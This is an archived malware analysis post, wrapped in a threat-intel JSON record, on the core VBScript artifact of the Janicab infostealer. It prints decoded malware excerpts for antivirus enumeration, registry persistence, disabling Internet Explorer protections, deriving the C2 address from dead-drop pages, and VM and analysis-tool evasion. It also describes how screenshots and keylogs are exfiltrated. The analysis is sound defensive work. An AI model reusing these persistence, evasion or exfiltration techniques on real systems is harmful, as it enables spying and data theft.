{
	"id": "0954d560-b8bd-491d-ae70-039097f6c7dc",
	"created_at": "2026-04-06T00:11:03.074729Z",
	"updated_at": "2026-04-10T03:30:57.069032Z",
	"deleted_at": null,
	"sha1_hash": "13437464984e3327e18ed864662731d66bdc8236",
	"title": "Janicab Series: The Core Artifact",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 237682,
	"plain_text": "Janicab Series: The Core Artifact\r\nPublished: 2022-05-27 · Archived: 2026-04-05 22:24:38 UTC\r\nIn late April 2022, I was requested to analyze a software artifact. It was an instance of Janicab, a software with\r\ninfostealing and spying capabilities known since 2013. Differently to other analyses I do as part of my job, in this\r\nparticular case I can disclose parts of it with you readers. I’m addressing those parts in a post series. Based on this\r\nspecific sample, here I’going to analyse the Janicab core artifact. If you want to know more about the previous\r\ninfection stages, I recommend you reading this post (first part) and this post (second part).\r\nArtifact 2.vbe, analysed here, stores an encoded VBScript as an alternate data stream for the %USERPROFILE%\r\ndirectory and later executes it. I claim that such a script is an instance of the Janicab malware. Therefore, I’m\r\ngoing to refer to this script with the name Janicab. I kindly ask the reader to trust my attribution for now, since I’ll\r\nprovide support for my claim in a dedicated and conclusive post.\r\noWMI = \"\"\r\nSet oWMI = GetObject(\"winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\SecurityCenter\")\r\nSet oWMI = GetObject(\"winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\SecurityCenter2\")\r\nIF vartype(oWMI) = vbString Then\r\ngetAV = \"Unsupported OS\"\r\nExit Function\r\nEND IF\r\nav = \"\"\r\nnumav = 0\r\nSet colItems = oWMI.ExecQuery(\"Select displayName from AntiVirusProduct\")\r\nListing 1\r\n-\r\nJanicab checks for the antivirus products installed on the infected system\r\nAs a first operation, Janicab attempts to understand which antivirus products are running on the infected system.\r\nTo achieve that, it leverages the Windows Management Instrumentation (WMI) API for VBScript and queries the\r\nAntivirusProduct class for the products names. It concatenates the antivirus names in a single AND-separated\r\nstring. 
Listing 1 shows the part of the Janicab code where the malware obtains the names of the installed antivirus products.\r\nSet objWMIService = GetObject(\"winmgmts:\\\\.\\root\\cimv2\")\r\nWhile 1\r\nkillRunningIE()\r\nWScript.Sleep 300000\r\nWend\r\nFunction killRunningIE()\r\n On Error Resume Next\r\n Set colProcessList = objWMIService.ExecQuery(\"SELECT * FROM Win32_Process WHERE Name = 'iexp\" \u0026 \"lore.exe'\")\r\n For Each objProcess in colProcessList\r\nOn Error Resume Next\r\nIf inStr(objProcess.CommandLine, \"-Embe\" \u0026 \"dding\") Then\r\nobjProcess.Terminate()\r\nEnd If\r\n Next\r\nEnd Function\r\nListing 2 - ie.vbe script as it appears after having decoded it\r\nhttps://www.malwarology.com/2022/05/janicab-series-the-core-artifact/\r\nPage 1 of 12\r\nJanicab embeds several files. All of them are encoded to escape an otherwise easy detection. The encoding is always the same for all the embedded artifacts. The first file being decoded is a VBScript stored on disk as an NTFS alternate data stream of the %USERPROFILE% directory with name ie.vbe. Ie.vbe is a VBScript encoded with the Windows Script Encoder. Janicab executes ie.vbe, which operates as a watchdog since it wakes up every five minutes and terminates all the instances of Internet Explorer embedded in other applications. Listing 2 shows the full listing (after the decoding) of ie.vbe.\r\nFigure 1 - SMTP-error.txt decoy file dropped by 2.vbe\r\nA second file dropped by Janicab consists of a Shell Link Binary file (LNK) named “Microsoft Sync Services.lnk” and stored in the %APPDATA%\\Microsoft directory. 
Similarly to what I observed for SMTP-error.txt.lnk (I analysed it in this post), after parsing the LNK file it is possible to observe the latter targeting cmd.exe and executing a file stored as an NTFS alternate data stream of %USERPROFILE% named h.vbe. Figure 1 shows just that.\r\nSet s = CreateObject(\"WScript.Shell\")\r\nSet fileSys = CreateObject(\"Scripting.FileSystemObject\")\r\nIF NOT IsProcessRunning(\"explorer.exe\") THEN\r\ns.Run \"explorer\", 0, 0\r\nEND IF\r\npath = s.ExpandEnvironmentStrings(\"%userprofile%\")\r\nSet objFolder = fileSys.GetFolder(path)\r\npath = objFolder.ShortPath\r\nSet objFolder = Nothing\r\nuserProfilePath = split(path, \"\\\")\r\nUsername = userProfilePath(Ubound(userProfilePath))\r\nSet userProfilePath = Nothing\r\ns.currentdirectory = path \u0026 \"\\..\"\r\ns.Run \"cscript \"\"\" \u0026 Username \u0026 \"\"\":.vbe\", 0, 0\r\nFunction IsProcessRunning(strProcess )\r\nOn Error Resume Next\r\n Dim Process, strObject\r\n IsProcessRunning = False\r\n strObject = \"winmgmts://\" \u0026 s.ExpandEnvironmentStrings(\"%ComputerName%\")\r\n For Each Process in GetObject( strObject ).InstancesOf( \"win32_process\" )\r\nabc = Process.name\r\nIf abc \u003c\u003e \"\" Then\r\n If UCase( Process.name ) = UCase( strProcess ) Then\r\nIsProcessRunning = True\r\nExit Function\r\nEnd If\r\nEnd If\r\n Next\r\nEnd Function\r\nListing 3 - h.vbe full listing\r\nA third file dropped by Janicab is the just-mentioned script h.vbe. As the extension may suggest, h.vbe is a VBScript encoded with the Windows Script Encoder. 
If you consider Listing 3, showing h.vbe, then you might notice that h.vbe starts explorer.exe if it isn’t running yet and eventually executes .vbe (discussed in this post).\r\nFunction HandleCCleaner()\r\nOn Error Resume Next\r\nccPath1 = s.ExpandEnvironmentStrings(\"%systemdrive%\") \u0026 \"\\Program Files\\CCleaner\"\r\nccPath2 = s.ExpandEnvironmentStrings(\"%systemdrive%\") \u0026 \"\\Program Files (x86)\\CCleaner\"\r\nIF fileSys.FolderExists(ccPath1) OR fileSys.FolderExists(ccPath2) THEN\r\npath1 = \"HKEY_CURRENT_USER\\Software\\Piriform\\CCleaner\\BrowserMonitoring\"\r\npath2 = \"HKEY_CURRENT_USER\\Software\\Piriform\\CCleaner\\(Mon)3001\"\r\ns.RegDelete path1\r\ns.RegDelete path2\r\nEND IF\r\nEnd Function\r\nListing 4 - Janicab disables the CCleaner browser monitoring capability\r\nJanicab disables the CCleaner browser monitoring capability. CCleaner is a common utility used for cleaning unused files and invalid registry entries. As you may notice from Listing 4, it first checks if CCleaner is installed on the infected system by testing the existence of either of two folders related to the application. If CCleaner is installed, then the malware disables the browser monitoring by deleting two registry keys controlling that capability:\r\nHKEY_CURRENT_USER\\Software\\Piriform\\CCleaner\\BrowserMonitoring\r\nHKEY_CURRENT_USER\\Software\\Piriform\\CCleaner\\(Mon)3001\r\nWindows Registry Editor Version 5.00\r\n[HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce]\r\n\"1\"=\"C:\\\\Users\\\\researcher\\\\AppData\\\\Roaming\\\\Microsoft\\\\Microsoft Sync Services.lnk\"\r\nListing 5 - Full content of runOnce.reg\r\nJanicab persists to the next reboot of the infected system since it sets a RunOnce key. 
This form of persistence is achieved by dropping a registry file named runOnce.reg and importing its content into the registry by issuing reg.exe. As you can see from the content of runOnce.reg shown in Listing 5, the RunOnce key points to the Microsoft Sync Services.lnk file. After the command has been issued, Janicab removes the runOnce.reg file.\r\nFigure 2 - .dll stores a screenshot as a JFIF image in an NTFS alternate data stream of %TMP%\r\nFigure 3 - Screenshot captured with .dll after issuing the commands of Figure 2\r\nJanicab drops a fifth file named .dll as an NTFS alternate data stream of the %USERPROFILE% directory. This artifact is a DLL exporting a screenshot capturing utility. Every time the MyDllEntryPoint export of .dll is executed, a screenshot is stored as an NTFS alternate data stream of %TMP% named ~PF214C.tmp. Figure 2 shows evidence of such behavior collected in a safe and controlled environment. Figure 3 shows the screenshot, a JFIF image, captured after issuing the commands reported in Figure 2.\r\nWindows Registry Editor Version 5.00\r\n[HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main]\r\n\"NoProtectedModeBanner\"=dword:00000001\r\n[HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3]\r\n\"2500\"=dword:00000003\r\nListing 6 - Full content of vista.reg\r\nJanicab leverages the WMI API for VBScript to query the Win32_OperatingSystem object and obtain the operating system version. If the running operating system is Microsoft Windows Vista (Vista) then the malware drops another registry file named vista.reg. Its content, as for many of the other drops I discuss in this post, is embedded in an obfuscated form. The content of vista.reg is reported in Listing 6. 
By executing vista.reg, Janicab attempts to disable Internet Explorer protected mode and the protected mode banner in Vista. After having imported vista.reg, Janicab removes the file.\r\nWindows Registry Editor Version 5.00\r\n[HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main]\r\n\"Enable Browser Extensions\"=\"no\"\r\n[HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings]\r\n\"BypassSSLNoCacheCheck\"=dword:00000001\r\n\"DisableCachingOfSSLPages\"=dword:00000000\r\nListing 7 - Full content of ie.reg\r\nFunction IPConvert(IPAddress)\r\n IF IsNumeric(IPAddress) THEN\r\n IPConvert = \"0.0.0.0\"\r\n For x = 1 To 4\r\n Num = Int(IPAddress / 256 ^ (4 - x))\r\n IPAddress = IPAddress - (Num * 256 ^ (4 - x))\r\n IF Num \u003e 255 THEN\r\n IPConvert = \"0.0.0.0\"\r\n Exit Function\r\n END IF\r\n IF x = 1 THEN\r\n IPConvert = Num\r\n ELSE\r\n IPConvert = IPConvert \u0026 \".\" \u0026 Num\r\n END IF\r\n Next\r\nEND IF\r\nEnd Function\r\nListing 8 - Janicab function responsible for converting the numerical seed to an IP address\r\nThe malware drops another registry file called ie.reg. This artifact is stored as an NTFS alternate data stream of the %USERPROFILE% directory. As you may notice from Listing 7, by importing ie.reg with the reg.exe utility, Janicab aims to disable Internet Explorer extensions. After all the operations just described, Janicab starts the procedure aimed at obtaining the IP address of the Command \u0026 Control (C2) server. The C2 IP address is computed starting from two distinct sources:\r\nhttp[s]://youtu.be/aZRJQdwN4-g\r\nhttp[s]://plus.google.com/108098760042015113400/posts?hl=en\r\nThe first link points to a YouTube video that had been made private at the time of analysis. The second link points to a Google+ post unavailable at the time of analysis due to the social media shutdown made official in 2019. 
However, from the Janicab source code, I know that the C2 IP address is computed starting from a numerical seed posted somewhere in the web pages hosted at those links. The seed is extracted by using the following regex: we need (.*) views . The seed is divided by the constant 1337 and eventually converted to an IP address with the function shown in Listing 8.\r\nThe malware loops potentially forever until it is able to find a seed in one of those pages. At each iteration of the loop, the link to be requested is picked at random. If Janicab is capable of obtaining the C2 address then it builds the C2 URL according to the following pattern: http://{C2-IP}/B2mV-VzVc-81Az-135J . The malware validates the C2 URL by requesting the /Status2.php resource expected to be hosted at the C2 URL. If it finds the string OKOKOK in the content of /Status2.php then the validation succeeds.\r\nEach infected host is uniquely identified by a 35-character serial code. The serial code is stored in a text file named pSerial.txt, itself stored in an NTFS alternate data stream of the %USERPROFILE% directory. Janicab checks the existence of the serial file and, when it succeeds, it reads the code from that file. In this case the malware deletes the cookies for Internet Explorer, Mozilla Firefox, and Google Chrome. Finally, it attempts a C2 check-in by requesting the resource /a.php hosted at the C2 URL. This is a GET request with the following parameters:\r\nid. The value for this parameter is the serial code\r\nv. The value for this parameter is the operating system version number\r\nav. The value for this parameter is the list of the installed antivirus products (AND-separated, as discussed before)\r\nIf Janicab doesn’t find a serial file on the infected system, it generates a new one by issuing a request to the C2 URL. 
The requested resource is /gid.php and the type of request is GET with the following parameters:\r\naction. This parameter is set to the value add\r\ncn. The value for this parameter is the computer name\r\nun. The value for this parameter is the username of the user logged in at the time of execution\r\nv. The value for this parameter is the operating system version number\r\nav. The value for this parameter is the list of the installed antivirus products (AND-separated, as discussed before)\r\nan. This parameter is set to the value tol7\r\nWindows Registry Editor Version 5.00\r\n[HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main]\r\n\"Check_Associations\"=\"no\"\r\n[HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\TabbedBrowsing]\r\n\"NewTabPageShow\"=dword:00000000\r\n[HKEY_CURRENT_USER\\Control Panel\\Cursors]\r\n\"AppStarting\"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,74,\\\r\n 00,25,00,5c,00,63,00,75,00,72,00,73,00,6f,00,72,00,73,00,5c,00,61,00,65,00,\\\r\n 72,00,6f,00,5f,00,61,00,72,00,72,00,6f,00,77,00,2e,00,63,00,75,00,72,00,00,\\\r\n 00\r\n\"Wait\"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,74,\\\r\n 00,25,00,5c,00,63,00,75,00,72,00,73,00,6f,00,72,00,73,00,5c,00,61,00,65,00,\\\r\n 72,00,6f,00,5f,00,61,00,72,00,72,00,6f,00,77,00,2e,00,63,00,75,00,72,00,00,\\\r\n 00\r\n[HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced]\r\n\"EnableBalloonTips\"=dword:00000000\r\n[HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Recovery]\r\n\"AutoRecover\"=dword:00000002\r\n[HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings]\r\n\"GlobalUserOffline\"=dword:00000000\r\n[HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon]\r\n\"Shell\"=\"wscript.exe \\\"%userprofile%:h.vbe\\\"\"\r\nListing 9 - Full content of r3g\r\nOnce it has obtained a new serial, the malware stores it on disk. Janicab asks the C2 whether it should set up a registry-based persistence point. That behavior is implemented by requesting the resource /sm.php hosted at the C2 URL. That is a GET request with a single parameter called data, set to the AND-separated list of the installed antiviruses. If the response to that request contains the string reg and, at the same time, Malwarebytes antivirus isn’t installed on the infected system, then Janicab drops a registry file named r3g. As you may notice from Listing 9, r3g sets a persistence point for the already discussed h.vbe artifact. Before importing r3g with reg.exe, the malware deletes Microsoft Sync Services.lnk from disk and removes the RunOnce persistence point for that file.\r\n00-01-5D 00-10-E0 00-50-56 00-16-3E 00-12-5A 00-25-AE\r\n00-03-BA 00-14-4F 00-0C-29 08-00-27 00-15-5D 00-50-C2\r\n00-07-82 00-20-F2 00-05-69 00-1C-14 00-17-FA 00-50-F2\r\n00-0F-4B 00-21-28 00-03-FF 08-00-20 00-1D-D8 44-45-53\r\n00-10-4F 00-21-F6 00-1C-42 00-0D-3A 00-22-48 7C-ED-8D\r\nTable 1 - Janicab hardcoded MAC substrings used to detect a virtualized environment\r\ntaskmgr.exe procexp64.exe immunitydebugger.exe gmer.exe\r\nprocmon.exe ollydbg.exe windbg.exe osam.exe\r\nprocmon64.exe wpe pro.exe tcpview.exe startup.exe\r\nprocexp.exe wireshark.exe tcpvcon.exe listdlls.exe\r\nTable 2 - Janicab checks if there exists a process whose name contains any of these strings\r\nJanicab operates a security assessment of the infected system aimed at understanding if it is being executed in an analysis environment. The security assessment is based on four different checks:\r\nBaseboard manufacturer check. Malware analysis environments are quite often virtualized. Virtual machines (VMs) usually emulate the hardware and sometimes VM software providers include their signature on some virtualized hardware pieces. 
Janicab relies on that when it verifies if the baseboard manufacturer contains any of the strings parallels, virtual platform, or virtualbox. This check is implemented by querying the WMI Win32_BaseBoard class for the Product field.\r\nInstalled drivers check. Another way to detect a VM consists of looking at the installed drivers. Just as for the hardware, VM distributors implement custom “fake” drivers exposing distinctive names. Janicab relies on that when it checks if any installed driver contains one of the following strings: virtualbox, parallels, vmware. The driver names are obtained by issuing the driverquery shell command.\r\nMAC address check. Another way to detect a VM consists of looking at the MAC address. This approach relies on the expectation that the default MAC addresses assigned by virtualization software tend to be the same for a given provider. Janicab verifies if the MAC address of the infected system contains one of the strings reported in Table 1 as a means to detect a virtualized environment. The MAC address of the infected system is obtained by issuing the ipconfig /all shell command.\r\nRunning processes check. Janicab attempts to understand if it is being executed in a malware analysis environment by verifying if any malware analysis tool is running on the infected system. To this end, the malware obtains a list of the currently running processes by issuing the tasklist shell command. Once that is done, Janicab checks if there exists a process whose name contains one of the strings listed in Table 2.\r\nIf any of the mentioned checks is satisfied then Janicab asks the C2 whether it should keep running or just quit. That behavior is implemented by issuing a GET request for the resource /rit.php hosted at the C2 URL. The request parameters are the following:\r\ncn. 
The value for this parameter is the computer name\r\nun. The value for this parameter is the username of the user logged in at the time of execution\r\nan. This parameter is set to the value tol7\r\nid. This parameter is set to the serial code\r\nr. This parameter groups all the material collected as a result of the security assessment. More precisely, it is set to a comma-separated list of the following strings: the baseboard manufacturer, the suspicious installed driver (if it was found), the suspicious MAC address (if it was found), and the suspicious running process (if it was found)\r\nvmProd = isVmProduct()\r\nvmDrivers = isVmDrivers()\r\nvmMac = isVmMAC()\r\nrunningProc = checkRunningProcess()\r\nIF NOT vmProd = False OR NOT vmDrivers = False OR NOT vmMac = False OR NOT runningProc = False THEN\r\nreason = vmProd \u0026 \", \" \u0026 vmDrivers \u0026 \", \" \u0026 vmMac \u0026 \", \" \u0026 runningProc\r\nit = getPage(server \u0026 \"/rit.php?cn=\" \u0026 computerName \u0026 \"\u0026un=\" \u0026 userName \u0026 \"\u0026an=\" \u0026 notifyName \u0026 \"\u0026id=\"\r\nIF NOT it = \"skip\" AND NOT fileSys.FileExists (s.ExpandEnvironmentStrings(\"%systemdrive%\") \u0026 \"\\xitx\") T\r\nWscript.Quit 0\r\nEND IF\r\nEND IF\r\nListing 10 - Janicab quits if it detects a malware analysis environment\r\nIf the response from the C2 is skip and, at the same time, there isn’t a directory named xitx under the system drive (pointed to by the %SYSTEMDRIVE% environment variable) then Janicab quits. I asked myself about the reason for that directory check. Since xitx is a domain name related to a provider of managed cybersecurity services, it is possible that the malware developer wanted to avoid execution on a system either running some product distributed by that firm or managed by that firm. 
Listing 10 shows an excerpt taken from the Janicab source code regarding the behavior I have just described.\r\nEvery minute, Janicab tries to perform the following actions in this exact order:\r\n1. If k.dll, the keylogging utility, has been dropped on the infected system then the malware executes it.\r\n2. Janicab contacts the C2 to fetch any command to execute on the infected system. The instance that is the object of this report defines two special commands: downFile and runVbs. Each special command should have a corresponding function named after the command and implementing the intended behavior. However, our instance only ships with the implementation for the downFile command. DownFile downloads a file hosted on the C2 server and stores it on disk. The download function issues a request to the C2 URL for the /d.php resource. This is a GET request having a single parameter, named f, holding the base64-encoded name of the file to be downloaded. In addition to the special commands, Janicab allows for the execution of any command that can be issued via powershell.exe if present, or cmd.exe otherwise.\r\n3. Janicab executes .dll, the screenshot capturing utility.\r\n4. If there exists a screenshot stored on the infected system then the malware sends it to the C2. This action is implemented by issuing a POST request to the C2 URL, resource /rs.php. The request parameters are:\r\ni. This parameter is set to the serial code\r\nd. This parameter is set to the base64-encoded screenshot\r\nt. This parameter is set to the request timestamp\r\nl. This parameter is set to the length of the encoded screenshot\r\nOnce the screenshot has been shipped, the malware wipes it from the infected system.\r\n5. If there exists some keylogger output on the infected system then Janicab sends it to the C2. This action is implemented by issuing a POST request to the C2 URL, resource /rk.php. 
The request parameters are exactly the same as those of the C2 request described in the previous point. Once the keylogger output has been shipped, the malware wipes that stream from the infected system.\r\nIn the next post I will conclude this series by discussing a bit about the attribution and by providing some Indicators of Compromise (IoCs) regarding this particular infection chain. As always, if you want to share comments or feedback (rigorously in broken Italian or broken English) do not hesitate to drop me a message at admin[@]malwarology.com.\r\nSource: https://www.malwarology.com/2022/05/janicab-series-the-core-artifact/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.malwarology.com/2022/05/janicab-series-the-core-artifact/"
	],
	"report_names": [
		"janicab-series-the-core-artifact"
	],
	"threat_actors": [
		{
			"id": "f9806b99-e392-46f1-9c13-885e376b239f",
			"created_at": "2023-01-06T13:46:39.431871Z",
			"updated_at": "2026-04-10T02:00:03.325163Z",
			"deleted_at": null,
			"main_name": "Watchdog",
			"aliases": [
				"Thief Libra"
			],
			"source_name": "MISPGALAXY:Watchdog",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434263,
	"ts_updated_at": 1775791857,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/13437464984e3327e18ed864662731d66bdc8236.pdf",
		"text": "https://archive.orkl.eu/13437464984e3327e18ed864662731d66bdc8236.txt",
		"img": "https://archive.orkl.eu/13437464984e3327e18ed864662731d66bdc8236.jpg"
	}
}